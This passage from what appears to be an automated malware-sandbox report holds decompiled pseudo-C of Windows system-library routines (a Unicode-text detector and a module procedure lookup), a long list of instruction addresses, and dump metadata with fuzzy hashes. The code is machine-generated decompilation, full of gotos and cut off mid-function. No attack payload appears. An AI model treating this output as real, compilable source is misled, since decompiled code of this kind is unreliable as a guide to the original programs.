				signed int _t256;
				signed int _t257;
				unsigned int _t258;
				void* _t261;

				_t213 = _a8;
				_t159 = 0;
				_v60 = 0;
				_t237 = _t213 >> 1;
				_t210 = 0;
				_t257 = 0;
				_v56 = 0;
				_v52 = 0;
				_v44 = 0;
				_v48 = 0;
				_v92 = 0;
				_v88 = 0;
				_v76 = 0;
				_v72 = 0;
				_v64 = 0;
				_v68 = 0;
				_v24 = 0;
				_v80 = 0;
				_v84 = 0;
				_v28 = 0;
				_v32 = 0;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_v100 = _t237;
				if(_t237 > 0x100) {
					_t254 = 0x100;
					_v36 = 0x100;
					L2:
					_t261 = _t213 - 2;
					if(_t261 == 0) {
						_t214 = _a4;
						_t160 =  *_t214 & 0x0000ffff;
						__eflags = _t160;
						if(_t160 == 0) {
							L108:
							_t159 = 0;
							L8:
							_t238 = 0;
							_v96 = 0;
							if(_t254 == 0) {
								L30:
								_v24 = _t159 - 1;
								goto L31;
							} else {
								goto L11;
								L13:
								_t224 = _t223 >> 8;
								_v40 = _t224;
								_t256 = _t224 & 0x000000ff;
								_t196 = _a4[_t238];
								_v5 = _t196;
								_t197 = _t196 & 0x000000ff;
								if(_t197 == 0xd) {
									__eflags = _t257 - 0xa;
									if(_t257 == 0xa) {
										_v12 = _v12 + 1;
									}
								} else {
									if(_t197 == 0xa) {
										__eflags = _t257 - 0xd;
										if(_t257 == 0xd) {
											_v12 = _v12 + 1;
										}
									}
								}
								_v24 = (0 | _t256 == 0x00000000) + _v24 + (0 | _t197 == 0x00000000);
								if(_t256 > _t257) {
									_t229 = _t256;
								} else {
									_t229 = _t257;
								}
								if(_t257 >= _t256) {
									_t257 = _t256;
								}
								_v28 = _v28 + _t229 - _t257;
								_t231 = _t197;
								if(_t197 <= _t210) {
									_t231 = _t210;
								}
								if(_t210 >= _t197) {
									_t210 = _t197;
								}
								_v32 = _v32 + _t231 - _t210;
								_t238 = _v96 + 1;
								_t210 = _t197;
								_t257 = _t256;
								_v96 = _t238;
								if(_t238 < _v36) {
									_t214 = _a4;
									L11:
									_t223 = _t214[_t238] & 0x0000ffff;
									_t193 = _t223 & 0x0000ffff;
									if(_t193 >= 0x900 || _t193 < 0x21) {
										goto L58;
									} else {
										goto L13;
									}
								}
								_t198 = _v5;
								if(_t198 == 0xd) {
									_t199 = _v40;
									__eflags = _t199 - 0xa;
									if(_t199 != 0xa) {
										L27:
										_t233 = _v12;
										L28:
										if(_t199 != 0) {
											__eflags = _t199 - 0x1a;
											if(_t199 == 0x1a) {
												_v12 = _t233 + 1;
											}
											L31:
											_t162 = _a8;
											if(_t162 > 0x200) {
												_t255 = 0x200;
											} else {
												_t255 = _t162;
											}
											_t215 =  *0x3936d59; // 0x0
											if(_t215 != 0) {
												_t239 = 0;
												__eflags = _t255;
												if(_t255 == 0) {
													goto L34;
												} else {
													goto L119;
												}
												do {
													L119:
													_t192 =  *(_a4 + _t239) & 0x000000ff;
													__eflags =  *((short*)(0x3936920 + _t192 * 2));
													_t163 = _v20;
													if( *((short*)(0x3936920 + _t192 * 2)) != 0) {
														_t163 = _t163 + 1;
														_t239 = _t239 + 1;
														__eflags = _t239;
														_v20 = _t163;
													}
													_t239 = _t239 + 1;
													__eflags = _t239 - _t255;
												} while (_t239 < _t255);
												goto L35;
											} else {
												L34:
												_t163 = 0;
												L35:
												_t240 = _v32;
												_t211 = _v28;
												if(_t240 < 0x7f) {
													__eflags = _t211;
													if(_t211 != 0) {
														L37:
														if(_t240 == 0) {
															_v16 = 0x10;
														}
														L38:
														_t258 = _a12;
														if(_t215 != 0) {
															__eflags = _t163;
															if(_t163 == 0) {
																goto L39;
															}
															__eflags = _t258;
															if(_t258 == 0) {
																goto L39;
															}
															__eflags =  *_t258 & 0x00000400;
															if(( *_t258 & 0x00000400) == 0) {
																goto L39;
															}
															_t218 = _v100;
															__eflags = _t218 - 0x100;
															if(_t218 > 0x100) {
																_t218 = 0x100;
															}
															_t220 = (_t218 >> 1) - 1;
															__eflags = _v20 - 0xaaaaaaab * _t220 >> 0x20 >> 1;
															if(_v20 >= 0xaaaaaaab * _t220 >> 0x20 >> 1) {
																_t221 = _t220 + _t220;
																__eflags = _v20 - 0xaaaaaaab * _t221 >> 0x20 >> 1;
																asm("sbb ecx, ecx");
																_t216 =  ~_t221 + 1;
																__eflags = _t216;
															} else {
																_t216 = 3;
															}
															_v16 = _v16 | 0x00000400;
															_t240 = _v32;
															L40:
															if(_t211 * _t216 < _t240) {
																_v16 = _v16 | 0x00000002;
															}
															_t217 = _v16;
															if(_t240 * _t216 < _t211) {
																_t217 = _t217 | 0x00000020;
															}
															if(_v44 + _v48 + _v52 + _v56 + _v60 != 0) {
																_t217 = _t217 | 0x00000004;
															}
															if(_v64 + _v68 + _v72 + _v76 != 0) {
																_t217 = _t217 | 0x00000040;
															}
															if(_v80 + _v84 + _v88 + _v92 == 0) {
																_t212 = _v12;
																__eflags = _t212;
																if(_t212 == 0) {
																	goto L48;
																}
																__eflags = _t212 - 0xcccccccd * _t255 >> 0x20 >> 5;
																if(_t212 >= 0xcccccccd * _t255 >> 0x20 >> 5) {
																	goto L47;
																}
																goto L48;
															} else {
																L47:
																_t217 = _t217 | 0x00000100;
																L48:
																if((_a8 & 0x00000001) != 0) {
																	_t217 = _t217 | 0x00000200;
																}
																if(_v24 != 0) {
																	_t217 = _t217 | 0x00001000;
																}
																_t180 =  *_a4 & 0x0000ffff;
																if(_t180 != 0xfeff) {
																	__eflags = _t180 - 0xfffe;
																	if(_t180 == 0xfffe) {
																		_t217 = _t217 | 0x00000080;
																	}
																} else {
																	_t217 = _t217 | 0x00000008;
																}
																if(_t258 != 0) {
																	 *_t258 =  *_t258 & _t217;
																	_t217 =  *_t258;
																}
																if((_t217 & 0x00000b08) != 8) {
																	__eflags = _t217 & 0x000000f0;
																	if((_t217 & 0x000000f0) != 0) {
																		L84:
																		return 0;
																	}
																	__eflags = _t217 & 0x00000f00;
																	if((_t217 & 0x00000f00) == 0) {
																		__eflags = _t217 & 0x0000f00f;
																		if((_t217 & 0x0000f00f) == 0) {
																			goto L84;
																		}
																		goto L56;
																	}
																	goto L84;
																} else {
																	L56:
																	return 1;
																}
															}
														}
														L39:
														_t216 = 3;
														goto L40;
													}
													_v16 = 1;
													goto L38;
												}
												if(_t211 == 0) {
													goto L38;
												}
												goto L37;
											}
										} else {
											_t159 = _v24;
											goto L30;
										}
									}
									L104:
									_t233 = _v12 + 1;
									_v12 = _t233;
									goto L28;
								}
								_t199 = _v40;
								if(_t198 != 0xa || _t199 != 0xd) {
									goto L27;
								} else {
									goto L104;
								}
								L58:
								__eflags = _t193 - 0x3001;
								if(_t193 < 0x3001) {
									L60:
									__eflags = _t193 - 0xd00;
									if(__eflags > 0) {
										__eflags = _t193 - 0x3000;
										if(__eflags > 0) {
											_t194 = _t193 - 0xfeff;
											__eflags = _t194;
											if(_t194 != 0) {
												_t200 = _t194 - 0xff;
												__eflags = _t200;
												if(_t200 == 0) {
													_v88 = _v88 + 1;
												} else {
													__eflags = _t200 == 1;
													if(_t200 == 1) {
														_v92 = _v92 + 1;
													}
												}
											}
										} else {
											if(__eflags == 0) {
												_v48 = _v48 + 1;
											} else {
												_t202 = _t193 - 0x2000;
												__eflags = _t202;
												if(_t202 == 0) {
													_v68 = _v68 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v76 = _v76 + 1;
										goto L13;
									}
									__eflags = _t193 - 0x20;
									if(__eflags > 0) {
										_t204 = _t193 - 0x900;
										__eflags = _t204;
										if(_t204 == 0) {
											_v64 = _v64 + 1;
										} else {
											_t205 = _t204 - 0x100;
											__eflags = _t205;
											if(_t205 == 0) {
												_v72 = _v72 + 1;
											} else {
												__eflags = _t205 == 0xd;
												if(_t205 == 0xd) {
													_v84 = _v84 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v44 = _v44 + 1;
										goto L13;
									}
									__eflags = _t193 - 0xd;
									if(_t193 > 0xd) {
										goto L13;
									}
									_t84 = _t193 + 0x3841174; // 0x4040400
									switch( *((intOrPtr*)(( *_t84 & 0x000000ff) * 4 +  &M03841160))) {
										case 0:
											_v80 = _v80 + 1;
											goto L13;
										case 1:
											_v52 = _v52 + 1;
											goto L13;
										case 2:
											_v56 = _v56 + 1;
											goto L13;
										case 3:
											_v60 = _v60 + 1;
											goto L13;
										case 4:
											goto L13;
									}
								}
								__eflags = _t193 - 0xfeff;
								if(_t193 < 0xfeff) {
									goto L13;
								}
								goto L60;
							}
						}
						__eflags = _t160 >> 8;
						if(_t160 >> 8 == 0) {
							L101:
							_t209 = _a12;
							__eflags = _t209;
							if(_t209 != 0) {
								 *_t209 = 5;
							}
							goto L84;
						}
						goto L108;
					}
					if(_t261 <= 0 || _t237 > 0x100) {
						_t214 = _a4;
					} else {
						_t214 = _a4;
						if((_t213 & 0x00000001) == 0 && ( *(_t214 + _t254 * 2 - 2) & 0x0000ff00) == 0) {
							_t254 = _t254 - 1;
							_v36 = _t254;
						}
					}
					goto L8;
				}
				_t254 = _t237;
				_v36 = _t254;
				if(_t254 == 0) {
					goto L101;
				}
				goto L2;
			}

0x03840d2b
0x03840d2e
0x03840d32
0x03840d39
0x03840d3b
0x03840d3d
0x03840d3f
0x03840d46
0x03840d4d
0x03840d54
0x03840d5b
0x03840d62
0x03840d69
0x03840d70
0x03840d77
0x03840d7e
0x03840d85
0x03840d88
0x03840d8b
0x03840d8e
0x03840d91
0x03840d94
0x03840d97
0x03840d9a
0x03840d9d
0x03840da6
0x038410e9
0x038410ee
0x03840db9
0x03840db9
0x03840dbc
0x0389e9c7
0x0389e9ca
0x0389e9cd
0x0389e9d0
0x0389e9dd
0x0389e9dd
0x03840dec
0x03840dec
0x03840dee
0x03840df3
0x03840ebf
0x03840ec0
0x00000000
0x03840df9
0x03840df9
0x03840e1e
0x03840e21
0x03840e24
0x03840e27
0x03840e2a
0x03840e2d
0x03840e30
0x03840e36
0x03841040
0x03841043
0x03841049
0x03841049
0x03840e3c
0x03840e3f
0x03841007
0x0384100a
0x03841010
0x03841010
0x0384100a
0x03840e3f
0x03840e58
0x03840e5d
0x03841000
0x03840e63
0x03840e63
0x03840e63
0x03840e67
0x03840e69
0x03840e69
0x03840e6d
0x03840e70
0x03840e74
0x03840e76
0x03840e76
0x03840e7a
0x03840e7c
0x03840e7c
0x03840e83
0x03840e86
0x03840e87
0x03840e89
0x03840e8b
0x03840e91
0x03840e00
0x03840e03
0x03840e03
0x03840e07
0x03840e0f
0x00000000
0x00000000
0x00000000
0x00000000
0x03840e0f
0x03840e97
0x03840e9c
0x0384113e
0x03841141
0x03841143
0x03840eb1
0x03840eb1
0x03840eb4
0x03840eb6
0x03841110
0x03841112
0x0389ea25
0x0389ea25
0x03840ec3
0x03840ec3
0x03840ecb
0x038410fe
0x03840ed1
0x03840ed1
0x03840ed1
0x03840ed3
0x03840edb
0x0389ea2d
0x0389ea2f
0x0389ea31
0x00000000
0x00000000
0x00000000
0x00000000
0x0389ea37
0x0389ea37
0x0389ea3a
0x0389ea3e
0x0389ea47
0x0389ea4a
0x0389ea4c
0x0389ea4d
0x0389ea4d
0x0389ea4e
0x0389ea4e
0x0389ea51
0x0389ea52
0x0389ea52
0x00000000
0x03840ee1
0x03840ee1
0x03840ee1
0x03840ee3
0x03840ee3
0x03840ee6
0x03840eec
0x0389ea5b
0x0389ea5d
0x03840ef6
0x03840ef8
0x0389ea6f
0x0389ea6f
0x03840efe
0x03840efe
0x03840f03
0x0389ea7b
0x0389ea7d
0x00000000
0x00000000
0x0389ea83
0x0389ea85
0x00000000
0x00000000
0x0389ea8b
0x0389ea91
0x00000000
0x00000000
0x0389ea97
0x0389ea9a
0x0389eaa0
0x0389eaa2
0x0389eaa2
0x0389eaae
0x0389eab3
0x0389eab6
0x0389eabf
0x0389eaca
0x0389eacd
0x0389ead1
0x0389ead1
0x0389eab8
0x0389eab8
0x0389eab8
0x0389ead2
0x0389ead9
0x03840f0e
0x03840f15
0x03840f17
0x03840f17
0x03840f1e
0x03840f23
0x0389eae1
0x0389eae1
0x03840f38
0x03840f3a
0x03840f3a
0x03840f49
0x03841108
0x03841108
0x03840f5b
0x038410c7
0x038410ca
0x038410cc
0x00000000
0x00000000
0x038410dc
0x038410de
0x00000000
0x00000000
0x00000000
0x03840f61
0x03840f61
0x03840f61
0x03840f67
0x03840f6b
0x0384111d
0x0384111d
0x03840f75
0x03840f77
0x03840f77
0x03840f85
0x03840f8b
0x038410b9
0x038410bc
0x0389eae9
0x0389eae9
0x03840f91
0x03840f91
0x03840f91
0x03840f96
0x03840f98
0x03840f9a
0x03840f9a
0x03840fa6
0x0384107c
0x0384107f
0x0384108d
0x00000000
0x0384108d
0x03841081
0x03841087
0x0389eaf4
0x0389eafa
0x00000000
0x00000000
0x00000000
0x0389eb00
0x00000000
0x03840fac
0x03840fac
0x00000000
0x03840fac
0x03840fa6
0x03840f5b
0x03840f09
0x03840f09
0x00000000
0x03840f09
0x0389ea63
0x00000000
0x0389ea63
0x03840ef4
0x00000000
0x00000000
0x00000000
0x03840ef4
0x03840ebc
0x03840ebc
0x00000000
0x03840ebc
0x03840eb6
0x03841149
0x0384114c
0x0384114d
0x00000000
0x0384114d
0x03840ea4
0x03840ea7
0x00000000
0x00000000
0x00000000
0x00000000
0x03840fb7
0x03840fb7
0x03840fbc
0x03840fc9
0x03840fc9
0x03840fce
0x03841020
0x03841025
0x03841094
0x03841094
0x03841099
0x0389ea04
0x0389ea04
0x0389ea09
0x0389ea1c
0x0389ea0b
0x0389ea0b
0x0389ea0e
0x0389ea14
0x0389ea14
0x0389ea0e
0x0389ea09
0x03841027
0x03841027
0x03841155
0x0384102d
0x0384102d
0x0384102d
0x03841032
0x0389e9fc
0x0389e9fc
0x03841032
0x03841027
0x00000000
0x03841025
0x03840fd0
0x0389e9f4
0x00000000
0x0389e9f4
0x03840fd6
0x03840fd9
0x03841059
0x03841059
0x0384105e
0x0389e9ec
0x03841064
0x03841064
0x03841064
0x03841069
0x038410ac
0x0384106b
0x0384106b
0x0384106e
0x03841074
0x03841074
0x0384106e
0x03841069
0x00000000
0x0384105e
0x03840fdb
0x038410a4
0x00000000
0x038410a4
0x03840fe1
0x03840fe4
0x00000000
0x00000000
0x03840fea
0x03840ff1
0x00000000
0x03840ff8
0x00000000
0x00000000
0x0389e9e4
0x00000000
0x00000000
0x03841018
0x00000000
0x00000000
0x03841051
0x00000000
0x00000000
0x00000000
0x00000000
0x03840ff1
0x03840fbe
0x03840fc3
0x00000000
0x00000000
0x00000000
0x03840fc3
0x03840df3
0x0389e9d5
0x0389e9d7
0x03841128
0x03841128
0x0384112b
0x0384112d
0x03841133
0x03841133
0x00000000
0x0384112d
0x00000000
0x0389e9d7
0x03840dc2
0x038410f6
0x03840dd4
0x03840dd7
0x03840dda
0x03840de8
0x03840de9
0x03840de9
0x03840dda
0x00000000
0x03840dc2
0x03840dac
0x03840dae
0x03840db3
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf08825ae88593dfdb40b57abbd5ec49763e73f3b67864bf0336192b2a370306
Instruction ID: 371baf5354bbe0281ff3cc13980a99b38cab80e9925ca136e1c638934b181ebb
Opcode Fuzzy Hash: bf08825ae88593dfdb40b57abbd5ec49763e73f3b67864bf0336192b2a370306
Instruction Fuzzy Hash: 19D1D1B1E0424D8BDF28CFD9C4943BEFBB5AB44305F2840EAD642EBA95D7749991CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0385D5E0, Relevance: .4, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E0385D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x393d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E03856600(0x39352d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x3937b9c; // 0x0
							_t281 = L03864620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0388F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x3937b90; // 0x770b0000
								if(_t384 == 0) {
									_t353 =  *0x3937b8c; // 0x3152b70
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E03862280(_t200, 0x39384d8);
									_t277 =  *0x39385f4; // 0x3153060
									_t351 =  *0x39385f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x3152ff8
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E0385FFB0(_t287, _t353, 0x39384d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0389CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E03856600(0x39352d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E03857926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x393b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E038CE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x3938472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x393b218; // 0x0
														asm("ror edi, cl");
														 *0x393b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E03862280(_t250, 0x39384d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L03883898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E0385FFB0(_t293, _t353, 0x39384d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E038837F5(_t353, 0);
																}
																E03880413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E03879B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E038702D6(_t174);
																}
																L038677F0( *0x3937b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0387C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0385EC7F(_t353);
										L038719B8(_t287, 0, _t353, 0);
										_t200 = E0384F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0388B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x393b2f8; // 0xcd0000
									if((_t206 |  *0x393b2fc) == 0 || ( *0x393b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x393b2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E038F6B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E038F6AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E0385E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L0385EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E03889730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E0385E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
